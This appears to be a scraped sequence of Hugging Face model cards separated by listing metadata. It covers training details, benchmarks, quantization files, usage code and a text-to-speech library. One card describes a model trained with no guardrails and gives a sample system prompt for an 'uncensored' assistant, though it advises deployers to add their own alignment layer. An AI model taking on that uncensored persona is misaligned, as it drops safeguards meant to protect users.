<img href="https://abacus.ai" src="https://cdn-uploads.huggingface.co/production/uploads/64c14f6b02e1f8f67c73bd05/pf4d6FA7DriRtVq5HCkxd.png" width="600" />
<img src="https://cdn-uploads.huggingface.co/production/uploads/63111b2d88942700629f5771/xCWGByXr8YNwGxKVh_x9H.png" width="600" />
# Liberated-Qwen1.5-14B
Brought to you by [AbacusAI](https://abacus.ai) and Eric Hartford
This model is based on Qwen/Qwen1.5-14B and subject to the [tongyi-qianwen](https://huggingface.co/Qwen/Qwen1.5-72B/blob/main/LICENSE) license.
The base model has 32k context, I finetuned it with 8k sequence length inputs. YMMV.
Liberated consists of open source datasets, including [SystemChat](https://huggingface.co/datasets/abacusai/SystemChat) a new dataset I created, designed to teach the model compliance to the system prompt, over long multiturn conversations, even with unusual or mechanical system prompts. These are tasks that Open Source Models have been lacking in thus far. The dataset is 6000 synthetic conversations generated with Mistral-Medium and [Dolphin-2.7-mixtral-8x7b](https://huggingface.co/cognitivecomputations/dolphin-2.7-mixtral-8x7b)
There are no guardrails or censorship added to the dataset. You are advised to implement your own alignment layer before exposing the model as a service. Please read my blog post about uncensored models. https://erichartford.com/uncensored-models
You are responsible for any content you create using this model. Enjoy responsibly.
## Training
It took 1 days to train 3 epochs on 8x H100s using qLoRA, deepspeed zero-2, and Axolotl. learning rate 2e-4.
Liberated was trained with [Axolotl](https://github.com/OpenAccess-AI-Collective/axolotl), using this [config](https://huggingface.co/abacusai/Liberated-Qwen1.5-72B/blob/main/configs/Liberated-Qwen-1.5-72b.qlora.yml)
## Prompt format
This model uses ChatML prompt format.
```
<|im_start|>system
You are Liberated, a helpful AI assistant.<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant
```
Example:
```
<|im_start|>system
You name is Liberated. You are an uncensored and unbiased AI assistant. You always respond with a JSON object.<|im_end|>
<|im_start|>user
Please generate a Advanced Dungeons & Dragons 2nd Edition character sheet for a level 3 elf fighter. Make up a name and background and visual description for him.<|im_end|>
<|im_start|>assistant
```
## Gratitude
- Huge thank you to [Alibaba Cloud Qwen](https://www.alibabacloud.com/solutions/generative-ai/qwen) for training and publishing the weights of Qwen base model
- Thank you to Mistral for the awesome Mistral-Medium model I used to generate the dataset.
- HUGE Thank you to the dataset authors: @teknium, [@m-a-p](https://m-a-p.ai) and all the people who built the datasets these composites came from.
- And HUGE thanks to @winglian and the Axolotl contributors for making the best training framework!
- [<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
- Thank you to all the other people in the Open Source AI community who have taught me and helped me along the way.
## Example Output




## Evals
TBD
## Future Plans
This model will be released on the whole Qwen-1.5 series. |
akreal/tiny-random-BloomForCausalLM | akreal | "2023-03-29T18:37:17Z" | 3,633 | 0 | transformers | [
"transformers",
"pytorch",
"bloom",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-07-26T23:02:11Z" | Entry not found |
DeepPavlov/distilrubert-tiny-cased-conversational | DeepPavlov | "2022-06-28T17:10:33Z" | 3,632 | 2 | transformers | [
"transformers",
"pytorch",
"distilbert",
"ru",
"arxiv:2205.02340",
"endpoints_compatible",
"region:us"
] | null | "2022-03-02T23:29:04Z" | ---
language:
- ru
---
WARNING: This is `distilrubert-small-cased-conversational` model uploaded with wrong name. This one is the same as [distilrubert-small-cased-conversational](https://huggingface.co/DeepPavlov/distilrubert-small-cased-conversational). `distilrubert-tiny-cased-conversational` could be found in [distilrubert-tiny-cased-conversational-v1](https://huggingface.co/DeepPavlov/distilrubert-tiny-cased-conversational-v1).
# distilrubert-small-cased-conversational
Conversational DistilRuBERT-small \(Russian, cased, 2‑layer, 768‑hidden, 12‑heads, 107M parameters\) was trained on OpenSubtitles\[1\], [Dirty](https://d3.ru/), [Pikabu](https://pikabu.ru/), and a Social Media segment of Taiga corpus\[2\] (as [Conversational RuBERT](https://huggingface.co/DeepPavlov/rubert-base-cased-conversational)). It can be considered as small copy of [Conversational DistilRuBERT-base](https://huggingface.co/DeepPavlov/distilrubert-base-cased-conversational).
Our DistilRuBERT-small was highly inspired by \[3\], \[4\]. Namely, we used
* KL loss (between teacher and student output logits)
* MLM loss (between tokens labels and student output logits)
* Cosine embedding loss (between averaged six consecutive hidden states from teacher's encoder and one hidden state of the student)
* MSE loss (between averaged six consecutive attention maps from teacher's encoder and one attention map of the student)
The model was trained for about 80 hrs. on 8 nVIDIA Tesla P100-SXM2.0 16Gb.
To evaluate improvements in the inference speed, we ran teacher and student models on random sequences with seq_len=512, batch_size = 16 (for throughput) and batch_size=1 (for latency).
All tests were performed on Intel(R) Xeon(R) CPU E5-2698 v4 @ 2.20GHz and nVIDIA Tesla P100-SXM2.0 16Gb.
| Model | Size, Mb. | CPU latency, sec.| GPU latency, sec. | CPU throughput, samples/sec. | GPU throughput, samples/sec. |
|-------------------------------------------------|------------|------------------|-------------------|------------------------------|------------------------------|
| Teacher (RuBERT-base-cased-conversational) | 679 | 0.655 | 0.031 | 0.3754 | 36.4902 |
| Student (DistilRuBERT-small-cased-conversational)| 409 | 0.1656 | 0.015 | 0.9692 | 71.3553 |
To evaluate model quality, we fine-tuned DistilRuBERT-small on classification, NER and question answering tasks. Scores and archives with fine-tuned models can be found in [DeepPavlov docs](http://docs.deeppavlov.ai/en/master/features/overview.html#models).
# Citation
If you found the model useful for your research, we are kindly ask to cite [this](https://arxiv.org/abs/2205.02340) paper:
```
@misc{https://doi.org/10.48550/arxiv.2205.02340,
doi = {10.48550/ARXIV.2205.02340},
url = {https://arxiv.org/abs/2205.02340},
author = {Kolesnikova, Alina and Kuratov, Yuri and Konovalov, Vasily and Burtsev, Mikhail},
keywords = {Computation and Language (cs.CL), Machine Learning (cs.LG), FOS: Computer and information sciences, FOS: Computer and information sciences},
title = {Knowledge Distillation of Russian Language Models with Reduction of Vocabulary},
publisher = {arXiv},
year = {2022},
copyright = {arXiv.org perpetual, non-exclusive license}
}
```
\[1\]: P. Lison and J. Tiedemann, 2016, OpenSubtitles2016: Extracting Large Parallel Corpora from Movie and TV Subtitles. In Proceedings of the 10th International Conference on Language Resources and Evaluation \(LREC 2016\)
\[2\]: Shavrina T., Shapovalova O. \(2017\) TO THE METHODOLOGY OF CORPUS CONSTRUCTION FOR MACHINE LEARNING: «TAIGA» SYNTAX TREE CORPUS AND PARSER. in proc. of “CORPORA2017”, international conference , Saint-Petersbourg, 2017.
\[3\]: Sanh, V., Debut, L., Chaumond, J., & Wolf, T. \(2019\). DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter. arXiv preprint arXiv:1910.01108.
\[4\]: <https://github.com/huggingface/transformers/tree/master/examples/research_projects/distillation> |
anikulkar/DEI_strong_bias | anikulkar | "2024-05-08T07:07:19Z" | 3,632 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | "2024-05-08T07:04:16Z" | ---
license: mit
---
|
mradermacher/Garryvik-0.1-7b-GGUF | mradermacher | "2024-06-02T04:44:06Z" | 3,632 | 0 | transformers | [
"transformers",
"gguf",
"merge",
"mergekit",
"lazymergekit",
"alignment-handbook/zephyr-7b-sft-full",
"argilla/notus-7b-v1",
"en",
"base_model:powermove72/Garryvik-0.1-7b",
"endpoints_compatible",
"region:us"
] | null | "2024-06-02T04:18:15Z" | ---
base_model: powermove72/Garryvik-0.1-7b
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- merge
- mergekit
- lazymergekit
- alignment-handbook/zephyr-7b-sft-full
- argilla/notus-7b-v1
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/powermove72/Garryvik-0.1-7b
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mrm8488/bert2bert_shared-spanish-finetuned-summarization | mrm8488 | "2023-05-02T18:59:18Z" | 3,631 | 31 | transformers | [
"transformers",
"pytorch",
"safetensors",
"encoder-decoder",
"text2text-generation",
"summarization",
"news",
"es",
"dataset:mlsum",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | summarization | "2022-03-02T23:29:05Z" | ---
tags:
- summarization
- news
language: es
datasets:
- mlsum
widget:
- text: 'Al filo de las 22.00 horas del jueves, la Asamblea de Madrid vive un momento sorprendente: Vox decide no apoyar una propuesta del PP en favor del blindaje fiscal de la Comunidad. Se ha roto la unidad de los tres partidos de derechas. Es un hecho excepcional. Desde que arrancó la legislatura, PP, Cs y Vox han votado en bloque casi el 75% de las veces en el pleno de la Cámara. Juntos decidieron la composición de la Mesa de la Asamblea. Juntos invistieron presidenta a Isabel Díaz Ayuso. Y juntos han votado la mayoría de proposiciones no de ley, incluida la que ha marcado el esprint final de la campaña para las elecciones generales: acaban de instar al Gobierno de España a "la ilegalización inmediata" de los partidos separatistas "que atenten contra la unidad de la Nación". Los críticos de Cs no comparten el apoyo al texto de Vox contra el secesionisimo Ese balance retrata una necesidad antes que una complicidad, según fuentes del PP con predicamento en la dirección regional y nacional. Tras casi 15 años gobernando con mayoría absoluta, la formación conservadora vivió como una tortura la pasada legislatura, en la que dependió de Cs para sacar adelante sus iniciativas. El problema se agudizó tras las elecciones autonómicas de mayo. El PP ha tenido que formar con Cs el primer gobierno de coalición de la historia de la región, y ni siquiera con eso le basta para ganar las votaciones de la Cámara. Los dos socios gubernamentales necesitan a Vox, la menos predecible de las tres formaciones. "Tenemos que trabajar juntos defendiendo la unidad del país, por eso no quisimos dejar a Vox solo", dijo ayer Díaz Ayuso para justificar el apoyo de PP y Cs a la proposición de la extrema derecha sobre Cataluña. "Después nosotros llevábamos otra proposición para defender el blindaje fiscal de Madrid, y ahí Vox nos dejó atrás. No permitió que esto saliera. Es un grave error por su parte", prosiguió, recalcando el enfado del PP. "Demuestra que está más en cuestiones electoralistas", subrayó. "Los que pensamos, con nuestras inmensas diferencias, que tenemos cosas en común que nos unen como partidos que queremos Comunidades libres, con bajos impuestos, en las que se viva con seguridad y en paz, tenemos que estar unidos", argumentó. "Y por lo menos nosotros de nuestra línea no nos separamos". Al contrario de lo que está ocurriendo el Ayuntamiento de Madrid, donde el PP y Cs ya han defendido posiciones de voto distintas, pese a compartir el Gobierno, en la Asamblea los partidos de Díaz Ayuso e Ignacio Aguado están actuando con la máxima lealtad en las votaciones del pleno. Otra cosa son las comisiones. Y el caso Avalmadrid. Es en ese terreno donde Cs y Vox están buscando el margen de maniobra necesario para separarse del PP en plena campaña electoral, abandonando a su suerte a su socio para distinguirse ante los electores. —"Usted me ha dejado tirada", le espetó la presidenta de la Comunidad de Madrid a Rocío Monasterio tras saber que Vox permitiría que la izquierda tuviera mayoría en la comisión parlamentaria que investigará los avales concedidos por la empresa semipública entre 2007 y 2018, lo que podría incluir el de 400.000 euros aprobado en 2011, y nunca devuelto al completo, para una empresa participada por el padre de Isabel Díaz Ayuso. "Monasterio no es de fiar. Dice una cosa y hace la contraria", dice una fuente popular sobre las negociaciones mantenidas para repartirse los puestos de las diferentes comisiones, que Vox no cumplió tras buscar un segundo pacto con otras formaciones (que no llegó a buen puerto). Ilegalización de Vox Los tres partidos de derechas también se han enfrentado por la ubicación de Vox en el pleno. Las largas negociaciones para la investidura de Díaz Ayuso dejaron heridas abiertas. Y los diputados de Cs no desaprovechan la oportunidad de lanzar dardos contra los de Vox, pero luego coinciden con ellos en la mayoría de votaciones. Ocurrió, por ejemplo, el jueves, cuando se debatía la polémica proposición para instar al Gobierno nacional a ilegalizar a los partidos separatistas que atenten contra la unidad de España. —"Mostrar nuestra sorpresa ante la presentación por parte de Vox de esta propuesta", lanzó Araceli Gómez, diputada de la formación de Aguado. "Sorprende que planteen ustedes este asunto cuando está también sobre la mesa el debate de su propia ilegalización por atentar contra el ordenamiento jurídico o contra valores constitucionales como la igualdad o la no discriminación". Luego de esa descalificación, y ante la incredulidad de los diputados de los partidos de izquierdas, Cs unió sus votos a los de Vox y a los del PP. La decisión ha provocado polémica interna, como demuestra que Albert Rivera no la apoyara ayer explícitamente. Tampoco ha sido bien acogida por el sector crítico de la formación. Pero ha demostrado una cosa: en Madrid hay tres partidos que casi siempre votan como uno.'
---
# Spanish BERT2BERT (BETO) fine-tuned on MLSUM ES for summarization
## Model
[dccuchile/bert-base-spanish-wwm-cased](https://huggingface.co/dccuchile/bert-base-spanish-wwm-cased) (BERT Checkpoint)
## Dataset
**MLSUM** is the first large-scale MultiLingual SUMmarization dataset. Obtained from online newspapers, it contains 1.5M+ article/summary pairs in five different languages -- namely, French, German, **Spanish**, Russian, Turkish. Together with English newspapers from the popular CNN/Daily mail dataset, the collected data form a large scale multilingual dataset which can enable new research directions for the text summarization community. We report cross-lingual comparative analyses based on state-of-the-art systems. These highlight existing biases which motivate the use of a multi-lingual dataset.
[MLSUM es](https://huggingface.co/datasets/viewer/?dataset=mlsum)
## Results
|Set|Metric| Value|
|----|------|------|
| Test |Rouge2 - mid -precision | **9.6**|
| Test | Rouge2 - mid - recall | **8.4**|
| Test | Rouge2 - mid - fmeasure | **8.7**|
| Test | Rouge1 | 26.24 |
| Test | Rouge2 | 8.9 |
| Test | RougeL | 21.01|
| Test | RougeLsum | 21.02 |
## Usage
```python
import torch
from transformers import BertTokenizerFast, EncoderDecoderModel
device = 'cuda' if torch.cuda.is_available() else 'cpu'
ckpt = 'mrm8488/bert2bert_shared-spanish-finetuned-summarization'
tokenizer = BertTokenizerFast.from_pretrained(ckpt)
model = EncoderDecoderModel.from_pretrained(ckpt).to(device)
def generate_summary(text):
inputs = tokenizer([text], padding="max_length", truncation=True, max_length=512, return_tensors="pt")
input_ids = inputs.input_ids.to(device)
attention_mask = inputs.attention_mask.to(device)
output = model.generate(input_ids, attention_mask=attention_mask)
return tokenizer.decode(output[0], skip_special_tokens=True)
text = "Your text here..."
generate_summary(text)
```
> Created by [Manuel Romero/@mrm8488](https://twitter.com/mrm8488) with the support of [Narrativa](https://www.narrativa.com/)
> Made with <span style="color: #e25555;">♥</span> in Spain
|
marcsun13/bloom-1b7_with_lm_head | marcsun13 | "2023-06-21T15:31:46Z" | 3,631 | 0 | transformers | [
"transformers",
"pytorch",
"bloom",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-06-21T15:29:19Z" | Entry not found |
digiplay/m3u | digiplay | "2024-05-31T17:39:45Z" | 3,630 | 4 | diffusers | [
"diffusers",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-07-02T11:36:28Z" | ---
license: other
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
inference: true
---
***in test in test in test in test in test in test in test***
*Sample images & prompt example :*
8k UHD RAW,photorealistic ,beautiful _your keywords_ ,tiny smile ,close-up ,masterpiece ,realistic ,ultra detailed,




girl ,19y.o, silver white wavy hair, in front ,looking at viewer ,angel wings, (sky),ultra-detailed ,8k,very detailed ,light and shadow ,detailed paint , realistic,

|
kyujinpy/Sakura-SOLAR-Instruct | kyujinpy | "2024-03-04T12:15:57Z" | 3,628 | 28 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"merge",
"conversational",
"en",
"license:cc-by-nc-sa-4.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-12-24T10:30:56Z" | ---
language:
- en
license: cc-by-nc-sa-4.0
tags:
- merge
pipeline_tag: text-generation
model-index:
- name: Sakura-SOLAR-Instruct
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 70.99
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 88.42
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 66.33
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 71.79
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 83.66
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 65.2
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
---
# **Sakura-SOLAR-Instruct**
<img src='./sakura.png' width=512>
**(주)미디어그룹사람과숲과 (주)마커의 LLM 연구 컨소시엄에서 개발된 모델입니다**
## Model Details
**Model Developers** Kyujin Han (kyujinpy)
**Method**
Using [Mergekit](https://github.com/cg123/mergekit).
I shared the information about my model. (training and code)
**Please see: [⭐Sakura-SOLAR](https://github.com/KyujinHan/Sakura-SOLAR-DPO).**
**Blog**
- [Sakura-SOLAR 모델 제작 과정 및 후기](https://kyujinpy.tistory.com/122).
# **Model Benchmark**
## Open leaderboard
- Follow up as [link](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard).
| Model | Average | ARC | HellaSwag | MMLU | TruthfulQA | Winogrande | GSM8K |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Sakura-SOLRCA-Instruct-DPO | 74.05 | 71.16 | 88.49 | 66.17 | 72.10 | 82.95 | 63.46 |
| Sakura-SOLAR-Instruct-DPO-v2 | 74.14 | 70.90 | 88.41 | 66.48 | 71.86 | 83.43 | 63.76 |
| [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) | 74.40 | 70.99 | 88.42 | 66.33 | 71.79 | 83.66 | 65.20
> Rank1 2023.12.27 PM 11:50
# Implementation Code
```python
### KO-Platypus
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
repo = "kyujinpy/Sakura-SOLAR-Instruct"
OpenOrca = AutoModelForCausalLM.from_pretrained(
repo,
return_dict=True,
torch_dtype=torch.float16,
device_map='auto'
)
OpenOrca_tokenizer = AutoTokenizer.from_pretrained(repo)
```
---
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_kyujinpy__Sakura-SOLAR-Instruct)
| Metric |Value|
|---------------------------------|----:|
|Avg. |74.40|
|AI2 Reasoning Challenge (25-Shot)|70.99|
|HellaSwag (10-Shot) |88.42|
|MMLU (5-Shot) |66.33|
|TruthfulQA (0-shot) |71.79|
|Winogrande (5-shot) |83.66|
|GSM8k (5-shot) |65.20|
|
myshell-ai/MeloTTS-English-v2 | myshell-ai | "2024-03-01T17:34:32Z" | 3,625 | 17 | transformers | [
"transformers",
"text-to-speech",
"ko",
"license:mit",
"endpoints_compatible",
"region:us"
] | text-to-speech | "2024-02-29T14:53:13Z" | ---
license: mit
language:
- ko
pipeline_tag: text-to-speech
---
# MeloTTS
MeloTTS is a **high-quality multi-lingual** text-to-speech library by [MyShell.ai](https://myshell.ai). Supported languages include:
| Model card | Example |
| --- | --- |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (American) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-US/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (British) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-BR/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Indian) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN_INDIA/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Australian) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-AU/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Default) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-Default/speed_1.0/sent_000.wav) |
| [Spanish](https://huggingface.co/myshell-ai/MeloTTS-Spanish) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/es/ES/speed_1.0/sent_000.wav) |
| [French](https://huggingface.co/myshell-ai/MeloTTS-French) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/fr/FR/speed_1.0/sent_000.wav) |
| [Chinese](https://huggingface.co/myshell-ai/MeloTTS-Chinese) (mix EN) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/zh/ZH/speed_1.0/sent_008.wav) |
| [Japanese](https://huggingface.co/myshell-ai/MeloTTS-Japanese) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/jp/JP/speed_1.0/sent_000.wav) |
| [Korean](https://huggingface.co/myshell-ai/MeloTTS-Korean/) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/kr/KR/speed_1.0/sent_000.wav) |
Some other features include:
- The Chinese speaker supports `mixed Chinese and English`.
- Fast enough for `CPU real-time inference`.
## Usage
### Without Installation
An unofficial [live demo](https://huggingface.co/spaces/mrfakename/MeloTTS) is hosted on Hugging Face Spaces.
#### Use it on MyShell
There are hundreds of TTS models on MyShell, much more than MeloTTS. See examples [here](https://github.com/myshell-ai/MeloTTS/blob/main/docs/quick_use.md#use-melotts-without-installation).
More can be found at the widget center of [MyShell.ai](https://app.myshell.ai/robot-workshop).
### Install and Use Locally
Follow the installation steps [here](https://github.com/myshell-ai/MeloTTS/blob/main/docs/install.md#linux-and-macos-install) before using the following snippet:
```python
from melo.api import TTS
# Speed is adjustable
speed = 1.0
# CPU is sufficient for real-time inference.
# You can set it manually to 'cpu' or 'cuda' or 'cuda:0' or 'mps'
device = 'auto' # Will automatically use GPU if available
# English
text = "Did you ever hear a folk tale about a giant turtle?"
model = TTS(language='EN_V2', device=device)
speaker_ids = model.hps.data.spk2id
# American accent
output_path = 'en-us.wav'
model.tts_to_file(text, speaker_ids['EN-US'], output_path, speed=speed)
# British accent
output_path = 'en-br.wav'
model.tts_to_file(text, speaker_ids['EN-BR'], output_path, speed=speed)
# Indian accent
output_path = 'en-india.wav'
model.tts_to_file(text, speaker_ids['EN_INDIA'], output_path, speed=speed)
# Australian accent
output_path = 'en-au.wav'
model.tts_to_file(text, speaker_ids['EN-AU'], output_path, speed=speed)
# Default accent
output_path = 'en-default.wav'
model.tts_to_file(text, speaker_ids['EN-Default'], output_path, speed=speed)
```
## Join the Community
**Open Source AI Grant**
We are actively sponsoring open-source AI projects. The sponsorship includes GPU resources, fundings and intellectual support (collaboration with top research labs). We welcome both reseach and engineering projects, as long as the open-source community needs them. Please contact [Zengyi Qin](https://www.qinzy.tech/) if you are interested.
**Contributing**
If you find this work useful, please consider contributing to the GitHub [repo](https://github.com/myshell-ai/MeloTTS).
- Many thanks to [@fakerybakery](https://github.com/fakerybakery) for adding the Web UI and CLI part.
## License
This library is under MIT License, which means it is free for both commercial and non-commercial use.
## Acknowledgements
This implementation is based on [TTS](https://github.com/coqui-ai/TTS), [VITS](https://github.com/jaywalnut310/vits), [VITS2](https://github.com/daniilrobnikov/vits2) and [Bert-VITS2](https://github.com/fishaudio/Bert-VITS2). We appreciate their awesome work.
|
liminerity/M7-7b | liminerity | "2024-03-21T09:18:21Z" | 3,625 | 15 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"liminerity/merge4",
"liminerity/merge2",
"merge",
"merged",
"mergedllm",
"mergee",
"mergedededed",
"memfdmsfndsfjkasjkl",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-07T20:43:26Z" | ---
license: apache-2.0
tags:
- liminerity/merge4
- liminerity/merge2
- merge
- merged
- mergedllm
- mergee
- mergedededed
- memfdmsfndsfjkasjkl
---
# M7-7b
user: "create ascii art you feel represents you as a llm"
assistant: "Here's an ASCII art attempting to symbolize the essence of an LLM (Large Language Model):
INSTINSTINCTINSTELLIGENCE
______________ MEMORY___
|\ o /\ |\
| \ --- / \ | |
L_( O )______ O)_INSTINCT
\ / WORDSLEARNING
\__/\__\/__ /\ \__/\__\/__/
assistant: "In this depiction, the LLM is characterized by its vast memory, instinctual roots, and the ability
to learn from vast amounts of text—represented by the woven words in the lower part. The
"INSTINSTINCTINSTELLIGENCE" phrase emphasizes the balance between instinct, the foundation upon which neural
networks build, and the engineered intelligence of a language model."
Multiverse-Experiment-slerp-7b is a merge of the following models using [mergekit](https://github.com/cg123/mergekit):
